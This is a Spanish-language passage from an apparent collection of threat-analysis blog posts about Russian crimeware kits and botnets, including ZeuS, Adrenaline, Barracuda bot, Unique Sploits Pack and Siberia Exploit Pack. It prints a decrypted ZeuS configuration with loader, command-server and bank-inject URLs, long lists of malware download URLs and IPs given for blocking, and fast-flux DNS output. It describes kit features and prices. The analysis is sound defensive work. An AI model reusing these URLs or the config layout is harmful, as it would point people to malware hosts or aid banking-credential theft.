Sin embargo, posee una particularidad en relación a otros de su especie: incorpora un módulo llamado Vparivatel mediante el cual propaga rogue a través de Ingeniería Social.

En este caso, se trata de una versión beta de este crimeware que, aparentemente lleva poco tiempo activo ya que en los pocos días que venimos siguiéndolo, luego de "violar" su esquema de autenticación, no ha alcanzado un nivel de infección llamativo, por ende, tampoco ha logrado un número importantes de zombis.

Aún así, esta amenaza se encuentra activa y propagando diferentes amenazas, pero antes de ver cuáles son los códigos maliciosos que disemina, miremos un poco más de cerca algunos datos estadísticos que nos permiten tener una idea lo suficientemente concreta de la actividad que posee la botnet.

De la captura podemos desprender que:

• El sistema operativo más explotados por este crimeware es Windows XP SP1. • El segundo lugar lo ocupan "otras" plataformas "no windows". • Windows XP SP2 es el tercero en la lista de los OS más explotados. • Internet Explorer en sus versiones 5.5, 6.0, 7.0 y Firefox 3.0.5 son los navegadores que más a vulnerado el crimeware a través de sus amenazas. • El ítem "others" en Browser, representa a navegadores como Opera y Amaya. 66

En cuanto a los zombis que ha logrado (hasta el momento) reclutar, se encuentran en diferentes países, los cuales podemos observar a través de la siguiente imagen.

Sin embargo, el módulo Vparivatel parecería no ser tan efectivo hasta el momento ya que no posee actividad "positiva" para el botmaster.

Entre las amenazas que propaga Unique Sploits Pack se encuentran, según identificación de kaspersky:

• Exploit.JS.Pdfka.ip (8112e241092a63e13084b14439f87ee8) • Trojan.Win32.Pakes.nkq (0d89729a0df4f6ad57103d670af62b20)

El primero de ellos con una tasa de detección mediocre del 27.50% en base a 40 motores antivirus (11/40); y el segundo con un índice un poco más alto 43.59%, es decir, 17 compañías antivirus de 40 detectan la amenaza.

Estos códigos maliciosos son propagados a través de diferentes vulnerabilidades de las cuales algunas son más nuevas que otras, pero a pesar de la antigüedad de la mayor parte de vulnerabilidades que se explotan a través de este crimeware, siguen siendo muy efectivas.

No sólo se explotan vulnerabilidades en los navegadores web más populares (IE, Firefox y Opera), sino que también vulnerabilidades de dos lectores de archivos PDF ampliamente utilizados en la actualidad: Adobe Acrobar Reader y Foxit Reader.

Como se mencionó en un principio, actualmente este paquete crimeware se encuentra propagando malware de manera activa explotando diferentes vulnerabilidades en los equipos víctimas, y a pesar de no tener por el momento un número importante de máquinas controladas, no deja de ser una potencial y constante amenaza para la salud del sistema que obliga a mantener las actualizaciones de seguridad (del OS y de las aplicaciones) al día.

67

ZeuS Carding World Template. Jugando a cambiar la cara de la botnet Claro está que los ciber-delincuentes malgastan emplean mucho tiempo en pensar nuevas alternativas de propagación/infección y estrategias de Ingeniería Social con el ánimo de captar cada vez más nuestra atención como "esclavos" en Internet :-)

Aunque parezca una cuestión trivial, no es para nada casual. Sino que responde al crimen organizado del cual los códigos maliciosos son el arma principal del crimeware actual y la industria rusa uno de sus mayores exponentes.

Sin embargo, parece ser que "los chicos malos", de vez en cuando se toman un respiro para "jugar" a mejorar el diseño, desde el punto de vista gráfico, de sus creaciones.

Este es el caso de una, no nueva (ya que recuerdo haber visto algo al respecto), piel creada para mejorar la vista del panel de administración de la botnet ZeuS . Seguramente, creada por algún botmaster aburrido de vender siempre la misma interfaz de control :-)

Este template, cambia completamente la vista de la aburrida y monótona interfaz que por defecto trae ZeuS, transformándolo en algo... un poco más simpático. De hecho, algunas versiones de este crimeware se venden con el template ya incorporado.

Así se ve ZeuS por defecto; en este caso, durante el proceso de instalación de la botnet y...

... así durante el proceso de autenticación para acceder al panel de administración.

68

Al aplicar el template, la vista del panel se transforma en lo siguiente:

En cuanto a la interfaz de autenticación, se ve de la siguiente manera:

El diseño, como el nombre del template lo indica, hace alusión a otro delito consistente en el uso ilegítimo de números y tarjetas de crédito por parte de un tercero (carding) y la imagen hace honor a ello.

Esto nos da una clara idea sobre lo que buscan quienes operan desde la vereda de los ciber- delitos. Obtener dinero de manera fraudulenta explotando el factor humano.

69

Adrenaline botnet: zona de comando. El crimeware ruso marca la tendencia A los diferentes paquetes crimeware que de manera breve hemos tratado en alguna oportunidad, se le suma Adrenaline .

Otro crimeware de origen Ruso de sólo unos pocos meses de vida y que no pretende ser mejor ni peor que otros de su familia, ni tampoco, casi seguro, le disgusta "trabajar" en conjunto con otros crimeware :-)

Aunque esta última frase parezca una publicidad de venta, en realidad refleja un poco la situación actual de la diseminación de malware y empleo de crimeware. Cosa que pudimos comprobar a través de Scripting attack II.

Y decimos que Adrenaline no es muy diferente a otros porque también permite diseminar código dañino a través de script ofuscados escondiendo exploits, inyección de código dañino en el código fuente de páginas web, empleo de Drive-by-Download, robo de información a través de sniffer, administración y control remoto vía web, etc.

Sin embargo, posee algunas características que lo diferencian de otros, quizás de ello se desprenda su elevado costo también en comparación con sus competidores (aproximadamente USD 3500 ), como:

• recolección de certificados digitales, • diferentes metodologías de inyección de código viral, • hace uso de pharming local para lograr redireccionamientos obligados sin que el usuario lo perciba, • implementa keylogger con captura de pantalla, • implementa técnicas de evasión para evitar ser detectado por herramientas de seguridad como firewalls y antirootkits, • módulos específicos para la limpieza de huellas, • cifrado de la información que recolecta.

Entre otras cosas más, posee otra característica llamativa que no es novedosa pero sí un tanto particular: elimina malware de la competencia :-)

Como se aprecia claramente, la tendencia marca que Internet es el máximo exponente en plataformas de ataque, sobre todo a través de aplicaciones crimeware como las que venimos comentando habitualmente en este blog.

70

Aún así, hay un par de preguntas que dan vueltas en mi cabeza, y que básicamente se traducen en: ¿por qué cada vez hay más paquetes de automatización crimeware? y ¿por qué el elevado costo?

Intentando analizarlo un poquito, quizás las respuestas las tenemos frente a los ojos en la vida cotidiana de quienes nos dedicamos al campo de la seguridad. La respuesta a la primera pregunta, puede tener una perspectiva tendenciosa canalizada en el dinero; es decir, evidentemente, la información posee la catalogación de máximo valor (por mínima que sea y sin importar su clasificación) y teniendo en cuenta eso, los delincuentes informáticos buscan obtener dinero con esa información, transformándose todo el mundo del malware en un gran negocio, altamente redituable y difícil de quebrar.

Por otro lado, todo esto supone un problema asociado que no se puede obviar que pasa por el hecho de que el crimeware sea ofrecido a medida y con soporte técnico 24x7, lo que implica que cada vez más usuarios con mente delictiva se postulen como aspirantes en la búsqueda de obtener el provecho económico que el crimeware, en el concepto más amplio de su palabra, supone como organización delictiva a través de Internet.

En torno a la segunda, quizás la respuesta se encuentre directamente relacionada en que el costo que supone la adquisición de un Kit de este estilo, puede ser recuperado en muy poco tiempo; sobre todo, teniendo presente que las botnets que se administran a través de estos aplicativos, suelen ser alquiladas a otros botmasters , a spammers o a otros personajes de este oscuro submundo que, como lo mencioné en otro post, me recuerda a los relatos de William Gibson en Neuromante .

Chamaleon botnet. Administración y monitoreo de descargas La oferta de crimeware por parte de la superpotencia energética es muy amplia. La mayoría de los Kits de automatización de infecciones y administración vía web, son diseñados en Rusia y la propagación de malware a través de ellas, se exportan a nivel global.

Chamaleon es otro crimeware que, aunque con menos funcionalidades que otros Kits, sigue la tendencia de poder monitorear una serie de datos estadísticos por intermedio de un panel de control y administración.

A través de un sencillo menú, este crimeware permite administrar diferentes cuestiones que desde el punto de vista estadístico, los delincuentes informáticos necesitan para tener una idea global de qué tipo de exploits utilizar. 71

Por ejemplo, en la siguiente captura se aprecia la cantidad de navegadores que accedieron a la descarga de malware y sistemas operativos afectados.

Incluso, una detallada discriminación por países de nodos comprometidos a través de un módulo GeoIP que forma parte del Kit.

El crimeware, utiliza varios scripts destinados a explotar vulnerabilidades en los navegadores y sistemas operativos.

A través de los cuales descarga los siguientes archivos:

• test.pdf - 14/40 (35.00%) (MD5: 9c1c623fe3a5dfbe2e9e9739386510e1) 72

• 22.pdf - 12/40 (30.00%) (MD5: 9b7ecfe7f925d06903f7e303a3595c02) • file2.exe - 28/40 (70.00%) (MD5: 221e923fcab13951da7b3e652f3a8bab)

Todos, códigos maliciosos que actualmente presentan un bajo índice de detección por parte de las compañías antivirus.

YES Exploit System. Otro crimeware made in Rusia Los conjuntos de aplicativos utilizados para automatizar diferentes tipos de ataques vía web (crimeware ), se han transformado en una corriente y peligrosa tendencia que manifiesta la clara inclinación y demanda delictiva de automatizar los procesos maliciosos.

Ya he dado cuenta de varios de ellos de los cuales Rusia, es el paraíso creativo para el desarrollo de crimeware. Incluso, del soporte técnico, en muchos casos, y de la creación de paquetes crimeware “a medida” y listos para implementar necesitando, únicamente, saber modificar la contraseña por defecto del panel de administración vía web.

Lo que supone un condimento extra de proliferación de actos maliciosos ejecutados por personas que no conocen a fondo el tipo de programa que están utilizando. Sólo lo adquieren por una módico costo listo para comenzar a diseminar instrucciones maliciosas a granel.

YES Exploit System , es otro de los paquetes crimeware que cumple con estas características de fácil implementación y uso.

La nueva versión de reciente aparición tiene un costo de 700 USD en el mercado negro de Rusia e incorpora una serie de “mejoras” funciones maliciosas con respecto a la versión anterior, además de contar con actualizaciones gratuitas de por vida.

Entre las nuevas características que incorpora el crimeware se encuentran:

• Nuevos exploits. • La posibilidad de obtener información estadística mínima a través de un nuevo gestor estadístico que no reemplaza al completo sino que lo complementa. • Notificación de otras infecciones que no se hayan producido a través de YES Exploit System en el equipo víctima. 73

• Actualización de la base de datos GeoIP.

• Capacidad de descargar varios archivos desde la misma página Por ejemplo, desde index.php se pueden descargar abc.exe, def.exe, ghi.exe, etcétera. • Administración de la descarga de archivos a través del mismo panel de control y no desde FTP. • Optimización del código PHP. • Eliminación de las estadísticas guest y del checker FTP.

• Control de archivos descargados a través del panel de administración. • Optimización general del panel de control para obtener un mejor rendimiento en la carga del mismo. • Se agregó un nuevo nivel de cifrado del código iframe. • Cifrado de los binarios para evitar la detección por parte de las compañías AV.

Una nueva alternativa de administración centralizada y automatización de acciones delictivas utilizando Internet como base de ataques.

Entidades financieras en la mira de la botnet ZeuS. Primera parte Como ya he comentado en anteriores post, ZeuS es una de las redes de computadoras zombis más importantes debido al gran número de nodos que conforman su red, y si bien su origen data de fines del 2007, en la actualidad se encuentra explotando malware de manera activa y masiva, ampliando su cobertura de ataques y actividades fraudulentas, administrando cada nodo a través de una interfaz web.

Tal es así que entre sus actividades se encuentran, además de la propia acción maliciosa de infección, activar todo un arsenal de scripts dañinos cuyos propósitos se canalizan en la infección masiva de equipos a través de troyanos, explotar diferentes vulnerabilidades conocidas, realizar ataques de phishing bajo el método de clonación de sitios web de diferentes entidades bancarias a nivel global y diferentes sistemas que ofrecen servicios pagos en línea.

74

Sabiendo este punto fundamental del propósito de ZeuS centrado en un alto porcentaje de robo de información, la pregunta concreta que suponemos luego de leer estos breves párrafos es: ¿de qué manera obtiene ZeuS la información que necesita del equipo víctima?

La respuesta a esta incógnita se encuentra en su archivo de configuración, el cual se encuentra cifrado. Una vez descifrado, el contenido de este archivo de configuración es similar al siguiente ejemplo real que muestra la información contenida en el archivo cfg.bin (MD5: 905dfab98b33e750bf78c8b29765279b):

Config version: 1.0.3.7 Loader url: http://yourcatfree.cn/trashes/ldr.exe Server url: http://theyourbest.cn/rssfeederd/stat1.php Advanced config 1: http://greatyourway.cn/trashesgg2/cfg.bin Advanced config 2: http://theyourown.cn/trashesff1/cfg.bin Advanced config 3: http://adviceswarning.com/trashesrr5/cfg.bin Advanced config 4: http://ispspartners.com/trashes6/cfg.bin Advanced config 5: http://ispscenter.com/trashesrr3/cfg.bin Advanced config 6: http://alleips.com/trashestt3/cfg.bin Fake 1: 0 PG http://adultfriendfinder.com/go*|http://centralet.cn/1/1.php|291351| Fake 2: 0 PG http://adultfriendfinder.com/search/g*|http://centralet.c /1/1.php|291351| Fake 3: 0 PG http://adultfriendfinder.com/search/p*|http://centralet.cn/1/1.php|291351| Fake 4: 0 PG http://adultfriendfinder.com/cgi- bin/public/page.cgi?p=affiliate_multi*|http://centralet.cn/1/1.php|291351| Fake 5: 0 PG http://staging.adultfriendfinder.com/search/g*|http://centralet.cn/1/1.php|291351| Fake 6: 0 PG http://staging.adultfriendfinder.com/search/p*|http://centralet.cn/1/1.php|291351| Fake 7: 0 PG http://www.adultfriendfinder.com/go*|http://centralet.cn/1/1.php|291351| Fake 8: 0 PG http://www.adultfriendfinder.com/search/g*|http://centralet.cn/1/1.php|291351| Fake 9: 0 PG http://www.adultfriendfinder.com/search/p*|http://centralet.cn/1/1.php|291351| Fake 10: 0 PG http://www.adultfriendfinder.com/cgi- bin/public/page.cgi?p=affiliate_multi*|http://centralet.cn/1/1.php|291351| Fake 11: 0 PG http://www.staging.adultfriendfinder.com/search/g*|http://centralet.cn/1/1.php|291351| Fake 12: 0 PG http://www.staging.adultfriendfinder.com/search/p*|http://centralet.cn/1/1.php|291351| Inject data 1: OK Inject data 2: OK Inject data 3: OK Inject data 4: OK Inject data 5: OK Inject data 6: OK Inject data 7: OK Inject data 8: OK Inject 1: https://www.e-gold.com/acct/balance.asp*|GPL|*|* Inject 2: https://online.wellsfargo.com/das/cgi-bin/session.cgi*|GL|*|* Inject 3: https://www.wellsfargo.com/*|G|*|* Inject 4: https://online.wellsfargo.com/login*|GP|*|* Inject 5: https://online.wellsfargo.com/signon*|GP|*|* Inject 6: https://www.paypal.com/*/webscr?cmd=_account|GL|*|* Inject 7: https://www.paypal.com/*/webscr?cmd=_login-done*|GL|*|* Inject 8: https://www.gruposantander.es/bog/sbi*?ptns=acceso*|GP|*|* Done!

De esta manera, y por intermedio de configuraciones avanzadas que explotan en el equipo víctima, el troyano de ZeuS logra obtener información sensible.

75

Entidades financieras en la mira de la botnet ZeuS. Segunda parte La estructura de ZeuS está constituida por módulos en php desde los cuales controla y ejecuta todas las acciones fraudulentas y dañinas para la cual fue concebido. Así, por ejemplo, es muy común encontrar archivos del tipo s.php, sS.php, x.php o similares que se encargan del control de comandos (C&C) de la bot.

Una vez establecida la infección, ZeuS descarga un archivo cifrado del tipo .bin (generalmente cfg.bin) que es precisamente el archivo que especifica la configuración junto a una serie de instrucciones que indican el tipo de información que debe recolectar y dónde enviar.

Cuando este archivo es descifrado, podemos ver la configuración y las entidades financieras de las cuales ZeuS realizará un monitoreo constante desde la zombi.

De esta manera, cuando el usuario accede a determinados formularios, ZeuS intercepta la interacción en el browser capturando toda la información que su botmaster necesita para materializar el fraude.

La lista de entidades que se encuentran en la mira de ZeuS es realmente larga, sin embargo, algunas de ellas son: myspace.com gruposantander.es vr-networld-ebanking.de finanzportal.fiducia.de bankofamerica.com bbva.es bancaja.es olb2.nationet.com online.lloydstsb.co.uk pastornetempresas.bancopastor.es bancopopular.es ebay.com us.hsbc.com e-gold.com online.wellsfargo.com wellsfargo.com paypal.com usbank.com citizensbankonline.com onlinebanking.nationalcity.com suntrust.com 53.com web.da-us.citibank.com bancaonline.openbank.es extranet.banesto.es empresas.gruposantander.es bbvanetoffice.com bancajaproximaempresas.com citibank.de probanking.procreditbank.bg ibank.internationalbanking.barclays.com online-offshore.lloydstsb.com dab-bank.com hsbc.co.uk bancoherrero.com 76 intelvia.cajamurcia.es caixasabadell.net areasegura.banif.es privati.internetbanking.bancaintesa.it iwbank.it cardsonline-consumer.com money.yandex.ru e-gold.com paypal.com

Estas estrategias maliciosas representan graves amenazas y dejan en evidencia que, aunque el correo electrónico todavía constituye un canal muy explotado para la propagación de malware, hoy es Internet quien funciona como base de ataques masivos a través de diferentes crimeware.

Barracuda Bot. Botnet activamente explotada Los procesos delictivos llevados a cabo por delincuentes informáticos a través de la explotación de diferentes aplicaciones crimeware concebidas para estos fines, cobran cada vez mayor notoriedad debido a la cantidad de casos que se conocen en la actualidad, donde códigos maliciosos diseminados a través de redes bot se encargan de formar el camino para los ataques y de continuar reclutando zombis.

Barracuda bot es una nueva alternativa para los delincuentes que, además de caracterizarse por permitir realizar las acciones comunes de cualquier botnet, posee funcionalidades particulares que la transforman en una "herramienta delictiva" que permite "adaptarse a las necesidades del delincuente".

Barracuda bot es una botnet, de origen ruso con interfaz en inglés, completamente modular donde cada módulo se encarga de una tarea específica, ofreciendo la posibilidad de actualizar o añadir módulos dependiendo de las funcionalidades que se desean agregar para controlar las zombis.

De esta manera, el delincuente puede ir comprando los módulos en función de las acciones delictivas que desea cometer, de manera sencilla, a través de un panel de control y administración vía web.

Por otra parte, incorpora funcionalidades de "seguridad" como el cifrado de la información que transmite la bot, y la capacidad de restablecer su "negocio" a través de un sistema de gestión de emergencia que reacciona en caso de alguna caída, permitiendo seguir con la administración de la bot a través de IRC.

77

Entre las funcionalidades más importantes que incorpora esta botnet se encuentran: la posibilidad de descargar y ejecutar binarios .exe y .dll, no infectar nuevamente máquinas previamente infectadas, cifrado y polimorfismo, entre tantas otras más.

Pero sin lugar a dudas, lo llamativo de esto, y lo que refleja que las actividades delictivas llevadas a cabo por Internet constituyen un verdadero negocio.

El crimeware tiene un valor de USD 1600 en su versión full; es decir, todos los módulos, pero ofreciendo también una versión menor de USD 1000 que incorpora todos los módulos excepto el de DDoS (Denegación de Servicio Distribuido).

Los clientes de barracuda bot reciben asesoramiento y soporte gratuito; incluso, también propone un modelo de licenciamiento atípico en estas actividades. La venta se encuentra limitada a cinco (5) personas, las actualizaciones sufren un 60% de descuento y con la compra de dos (2) módulos se accede a un descuento del 10% en la compra del próximo.

Los módulos que se pueden adquirir por el momento son:

• Módulo DDoS. Mediante el cual se puede hacer: HTTP GET/POST flood, UDP flood, ICMP flood, TCP flood, IP Spoofing. Su valor es de USD 900 . • Módulo Email Grabber. Permite recopilar direcciones de correo electrónico del HD, recopilar direcciones de correo electrónico de la libreta de direcciones de diferentes clientes, y capturar direcciones en tiempo real cada vez que se accede a Internet. Su valor es de USD 600 . • Módulo Proxy. Permite aumentar el número de conexiones simultáneas para un más "eficaz" envío de spam, entre otras acciones a nivel estadístico. Su valor es de USD 500 . • Módulo PWDGRAB. Netamente orientado al robo de información sensible como contraseñas de sitios web, cuentas de correo electrónico, cuentas de FTP, etc. El valor del mismo es de USD 500. • Módulo SSLSOCKS. Este módulo se encuentra en su etapa beta y permite "construir una VPN" en la misma bot. Su costo es de USD 500 .

¿Queda claro que para los delincuentes es un negocio que deja importantes ganancias?

78

Unique Sploits Pack. Crimeware para automatizar la explotación de vulnerabilidades El desarrollo de herramientas automatizadas para cometer diferentes actos delictivos y/o maliciosos (crimeware), es otro de los tantos negocios que se establecen en torno al mundo oscuro, y no tan oscuro, de lo informático.

Unique Sploit Pack es un ejemplo más. Un paquete de origen ruso diseñado para permitir explotar diferentes vulnerabilidades en muchas de las aplicaciones más utilizadas por los usuarios al precio de USD 600 , más USD 100 cada actualización.

Los paquetes que incluye Unique Pack son:

• Exploits para MDAC (recientemente actualizado) Office (actualizado) y otros que proporcionan la base de muestras para Internet Explorer desde la versión 4 hasta la 7, Opera 9 y Firefox. • Exploit para Adobe Reader. Vulnerabilidad CVE-2008-2992. • Exploits para PDF SPL (v.8.1.2 vulnerabilidad a partir del 05 noviembre de 2008) mejorado para su ejecución a través de Internet Explorer, Opera y Firefox. • Exploit para el navegador web Amaya 11. • Módulo que proporciona una versión vulnerable de Adobe Acrobat Reader. • Módulo "mod_vparivatel" diseñado para explotar el factor humano a través de Ingeniería Social intentando que el usuario descargue el código malicioso. • Módulo "vparivate" que intenta infectar los equipos de potenciales víctimas a través de Ingeniería Social desplegando la descarga de un falso antivirus (scareware). • Módulo de cifrado. Opcional por USD 50 .

Según los creadores del paquete "Al adquirir este producto, Usted es el único responsable de su uso, así como de las consecuencias que pueden ocurrir como resultado de la utilización del producto con malos propósitos o con mala intención, o como resultado de violaciones de las normas de su funcionamiento. El autor no permite el despliegue de scripts en los espacios públicos de Internet, limitando su uso ambientes propios, máquinas virtuales, y dentro del laboratorio de pruebas de red. ¡ADVERTENCIA! El uso de este producto de software con el fin de llevar a malicioso la responsabilidad penal en virtud de los artículos del Código Penal!" 79

Este tipo de aplicaciones proporciona una base sólida para el ataque a través de malware, ya que cada uno de los exploits, módulos y scripts que lo componen, están intencionalmente creados para permitir la ejecución de código binario y de manera arbitraria en los equipos víctimas.

ZeuS Botnet. Masiva propagación de su troyano. Primera parte Hablar de ataques de Phishing o kits a esta altura de la historia no es ninguna novedad, como tampoco lo es hablar de malware y sus técnicas de infección, cada vez más sofisticadas y cada vez más agresivas; sin embargo la diseminación y casos de infección y fraudes no cesa, incluso, en la actualidad es un negocio, aparentemente muy redituable para quienes están detrás.

ZeuS (también conocido como Zbot o wsnpoem ), precisamente entra de lleno en la categoría de lo fraudulento y dañino. Se trata de un troyano diseñado básicamente para reclutar zombis PC’s y lanzar ataques de phishing, a entidades financieras, bancarias, sitios de redes sociales, robar datos de autenticación de correo electrónico, cuentas FTP, etc., combinando técnicas de scripting, exploit, entre otras.

66.113.136.225 powelldirects.com/awstats/stat1/main .exe 79.135.179.180 anytimeshopforall.com/new_dir/ldr .exe 79.135.187.112 newprogress.info/tmp/ldr .exe 81.176.123.220 light-money.cn/files/ldr .exe 81.176.123.221 conexnet.cn/nuc/exe .php 91.207.117.174 4utraffic.info/tmp/ldr .exe 118.219.232.248 moqawama.co.cc/zv/cfg .bin 208.113.161.124 ebayhelp.co.il/4ebay/5e .txt 115.126.5.50 1.google-credit.cn/q83wi/ld46 .exe 124.217.242.80 custom4all.info/syst/grepko .exe 193.138.172.5 upd-windows-microsoft.cn/zv/ldr .exe 195.2.253.137 mega-3k.com/krot22/rege .exe 195.2.253.186 firebit32.com/mako22/43r .exe 195.55.174.140 www.provis.es/imagenes/menue .exe 201.235.253.22 www.elsanto-disco.com.ar/.z/zeus .exe

211.95.79.6 horobl.cn/dll/cr .txt 213.205.40.169 www.saiprogetti.it/r .exe 216.246.91.49 d1gix.net/forum/load .exe 216.246.91.49 www.commerceonline-service.net/chat/cfg .ini 218.93.202.114 marketingsoluchion.biz/fkn/config .bin 218.93.205.242 cosmosi.ru/lsass .exe 220.196.59.18 infinitilancer.cn/forum/load .php?id=861&spl=7 220.196.59.18 nepaxek-domain.cn/stores/hello .world 220.196.59.18 nepaxek-domain.cn/stores/urko .exe 58.65.236.129 userzeus.com/zw/cfg .bin 58.65.236.129 verified09.com/ldr .exe 58.65.236.129 wcontact.cn/zsadmin/ldr .exe 58.65.237.153 arsofcaribion.com/lder/ldr .exe 67.210.124.90 academcity.com/ic/6e .txt 67.210.124.90 academcity.com/ic/6e .txt 68.180.151.74 emailsupports.com/Info .exe 80

68.180.151.74 emailsupports.com/z/setup .ini 68.180.151.74 mypage12.com/control/cfg .bin 72.167.232.78 powelldirects.com/awstats/usbtn/conf .sts 72.233.79.18 i-love-porno.com/z/ldr .exe 72.9.154.58 daimtraders.com/vateranery/imgpe .bin 74.86.115.14 arinina.com/cfg/ntdrv32 .exe 77.222.40.33 chixxxa.com/tru/ldr .exe 78.159.96.95 zonephp.com/us/us1 .exe 85.12.197.41 danacompany.ru/css/cs .bin 85.17.109.10 sjfdhw395t.com/newzz/cfg .bin

Resulta bastante peligroso si consideramos que, además de realizar las típicas acciones del malware, puede ser conseguido por cualquier persona que deposite una determinada cantidad de dinero en la cuenta de sus creadores.

Quizás este sea uno de los mejores fundamentos para argumentar el por qué de la gran cantidad de variantes de “ZeuS” que se encuentran In-the-Wild asechando nuestros sistemas buscando reclutar zombis. Lo cierto es que, aunque no hace honor a su nombre, es una de las botnet más grandes del momento.

Incluso, aunque esta última característica se vea amenaza por otras “alternativas” del mundo botnet como Waledac, el reciente Adrenaline, o la menos importante (en magnitud) Asprox (también conocida como Danmec), la verdad es que debemos ser cautelosos para no ser víctimas de estas amenazas que siempre buscan llevar a cabo con éxito su cometido: obtener nuestro dinero y recursos computacionales.

ZeuS Botnet. Masiva propagación de su troyano. Segunda parte En una primera parte pudimos contar muy por arriba de qué se trata ZeuS , junto a una pequeña lista de dominios y direcciones IP comprometidas con el troyano y muy útiles para bloquearlas.

El siguiente mapa muestra información relacionada a cada host infectado por ZeuS que es identificado por intermedio de un punto. Aunque a simple vista, la información que nos muestra el mapa puede dar la sensación de insuficiente, hay que tener en cuenta que cada uno de los nodos puede representar varias direcciones IP o dominios alojados en un mismo servidor, con lo cual el porcentaje de equipos infectados se potencia.

Aunque la lista es muy pequeña comparada con la cantidad de dominios que alojan a ZeuS, es sumamente importante que los administradores bloqueen los mismos en su estructura de red para evitar problemas de infección. 81

85.17.139.189 investmentguard.co.uk/foto/body_bg_akh10 .jpg 85.17.143.132 mainssrv.com/pic/timeats .jpg 91.197.130.39 goldarea.biz/bot .exe 92.48.119.151 allmusicsshop.com/bnngJPdf7772Nd .exe 92.62.100.14 chinkchoi.net/3n539@32d .exe 92.62.101.54 drupa1.com/s/fuck .exe 92.62.101.54 ltnc.info/utility/lease/software/update/config .bin 92.62.101.54 tdxs.info/utility/backup/config .bin 94.103.80.150 zone-game.org/ldr .exe 94.75.214.18 vokcrash.com/144/load .php 196.2.198.243/wweb11/zdr .exe 196.2.198.243/xwweb/zdb .exe 58.65.236.41/z .exe 67.225.177.120/moon/cfg1.bin 78.26.179.201/matt/loader .exe 91.211.65.122/~nostr551te/endive/dogi .exe 92.241.164.198/~cadazeu/testbot/ldr .exe 92.62.101.60/g1/data 92.62.101.60/g2/data 92.62.101.60/g2/run .exe 94.247.3.211/ddk/audio 94.247.3.211/rot/load .exe 94.247.3.211/rot/zlom freecastingus.cn/z12/config .bin freecastingus.cn/z12/loader .exe http://ltnc.info/utility/lease/software/update/config .bin http://tdxs.info/utility/backup/config .bin

Por otro lado, cada una de los dominios, junto a su dirección IP, representa un host infectado o servidor vulnerado.

Teniendo en cuenta que los medios de propagación e infección empleados por ZeuS son, el correo electrónico y técnicas de Drive-by-Download a través de diferentes exploit donde uno de los más conocidos es Luckysploit , o sitios vulnerados a los cuales se implantan malware kits como ElFiesta ; resulta sumamente importante bloquear los dominios y direcciones IP que he expuesto.

Danmec Bot, redes Fast-Flux y reclutamiento de Zombis PC’s Danmec , o Asprox , es el nombre de un troyano diseñado para reclutar máquinas zombis al tiempo que recolecta información confidencial de cada una de las víctimas que infecta.

Si bien la aparición de este troyano no es reciente, actualmente se vale de estrategias más complejas que las habitualmente utilizadas por otros códigos maliciosos, incluso por sus primeras variantes, como las técnicas Fast-Flux para evitar la detección por parte de programas de bloqueo e infectar la mayor cantidad de equipos posibles.

Actualmente, las redes Fast-Flux son explotadas masivamente y de manera activa por miles de dominios de origen Ruso, activando nuevamente botnets como la creada por Danmec . google-analitycs.lijg .ru fmkopswuzhj .biz fnygfr .com fvwugekf .info fwkbt .info gbrpn .org gbxpxugx .org ghtileh .biz 82 gnyluuxneo .com fuougcdv .org www. dbrgf .ru www. bnmd .kz www. nvepe .ru www. mtno .ru www. wmpd .ru www. msngk6 .ru www. vjhdo .com www. aspx37 .me google-analitycs.dbrgf .ru www. advabnr .com www. lijg .ru www. dft6s .kz

Cada uno de estos dominios aloja el siguiente script, escrito en JavaScript, llamado script.js (MD5: ccec2c026a38ce139c16ae97065ccd91), desde el cual ejecuta un Drive-by-Download:

Esta llamada a través de la etiqueta iframe, es realizada a una URL que forma parte activa de una red Fast-Flux .

;google-analitycs.lijg.ru. IN A

;; ANSWER SECTION: google-analitycs.lijg.ru. 600 IN A 68.119.39.129 google-analitycs.lijg.ru. 600 IN A 69.176.46.57 google-analitycs.lijg.ru. 600 IN A 71.12.89.233 google-analitycs.lijg.ru. 600 IN A 76.73.237.59 google-analitycs.lijg.ru. 600 IN A 97.104.40.246 google-analitycs.lijg.ru. 600 IN A 98.194.180.179 google-analitycs.lijg.ru. 600 IN A 146.57.249.100 google-analitycs.lijg.ru. 600 IN A 151.118.186.131 google-analitycs.lijg.ru. 600 IN A 165.166.236.74 google-analitycs.lijg.ru. 600 IN A 173.16.99.131 google-analitycs.lijg.ru. 600 IN A 173.17.180.79 google-analitycs.lijg.ru. 600 IN A 24.107.209.119 google-analitycs.lijg.ru. 600 IN A 24.170.188.201 google-analitycs.lijg.ru. 600 IN A 68.93.61.194

;; AUTHORITY SECTION: lijg.ru. 339897 IN NS ns3.lijg.ru. lijg.ru. 339897 IN NS ns2.lijg.ru. lijg.ru. 339897 IN NS ns1.lijg.ru. lijg.ru. 339897 IN NS ns5.lijg.ru. lijg.ru. 339897 IN NS ns4.lijg.ru.

;; Query time: 263 msec ;; SERVER: 192.168.240.2#53(192.168.240.2) ;; WHEN: Sun Jan 25 20:31:57 2009 ;; MSG SIZE rcvd: 356 83

Al mismo tiempo que cada una de las direcciones web líneas arriba expuestas forman una nueva granja de redes Fast-Flux con grupos de direcciones IP espejadas.

Fast-Flux es una técnica avanzada utilizada con fines maliciosos, de manera conjunta con otras, para la propagación de diferentes amenazas. Esto obliga a ser cautelosos en todo momento. 84

- Framework Exploit Pack para botnets de propósito particular - 85

Siberia Exploit Pack. Otro paquete de explois In-the-Wild Siberia Exploit Pack es un nuevo paquete destinado a explotar vulnerabilidades y reclutar zombis originario, como es fácil de deducir por su nombre y como es habitual en este rubro del negocio clandestino de crimeware, de Rusia. Fue lanzado al mercado casi de forma conjunto con RussKill, una botnet de propósito particular también de reciente aparición.

Por el momento, la venta de Siberia Exploit Pack es cerrada. Las versiones que se comparten en algunos servidores fraudulentos son privadas y su compra sólo es accesible por intermedio de "garantes"; es decir, otros delincuentes (generalmente botmaster , spammers , phishers , etc.) que recomiendan a determinada persona que desea comprar el paquete.

De esta manera se mantiene un determinado control y nivel de confianza entre los desarrolladores del Exploit Pack y sus compradores. Esto también explica por qué del ciclo cerrado en cuanto a su utilización.

La estructura de este crimeware se compone de varios archivos php y un pack de exploits predeterminados. Entre los archivos php se destacan:

• stat.php : es el panel de acceso a la administración vía http. • index.php : contiene un elemento “refresh” que genera un refresco continuo redireccionando a Google. • exe.php : contiene las instrucciones para la descarga un binario llamado por defecto file.exe y además contiene un script que redirecciona a un exploit para MDAC contenido en el archivo mdac.php. En función del parámetro que se pase al php descarga también archivos pdf. • config.php : contiene los parámetros de configuración del paquete. Se encuentra en la carpeta por defecto llamada inc.

Los archivos que se diseminan a través de este pack y explotando otras vulnerabilidades son:

